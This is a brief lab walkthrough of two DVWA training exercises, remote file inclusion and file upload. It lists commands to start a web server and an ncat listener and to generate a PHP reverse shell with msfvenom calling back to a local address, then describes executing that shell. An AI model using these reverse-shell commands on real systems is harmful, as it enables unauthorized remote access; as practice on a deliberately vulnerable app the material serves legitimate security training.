DVWA Exercises 4

07 Remote Fileinclusion

Start a local webserver listening on port 8001

python3 -m http.server 8001

Start a ncat listener on port 8002

ncat -lvnp 8002

Generate a php reverseshell with msfvenom

msfvenom -p php/reverse_php LHOST="172.17.0.1" LPORT=8002 -f raw >shell.php

First let's do a check if a remote target can be placed in the URL:

That seems to work! I can also see the http get request for test.php on my local webserver:

And now let's execute the remoteshell:

08 File upload

Php Reverseshell successfully uploaded

Let's try to execute the reverseshell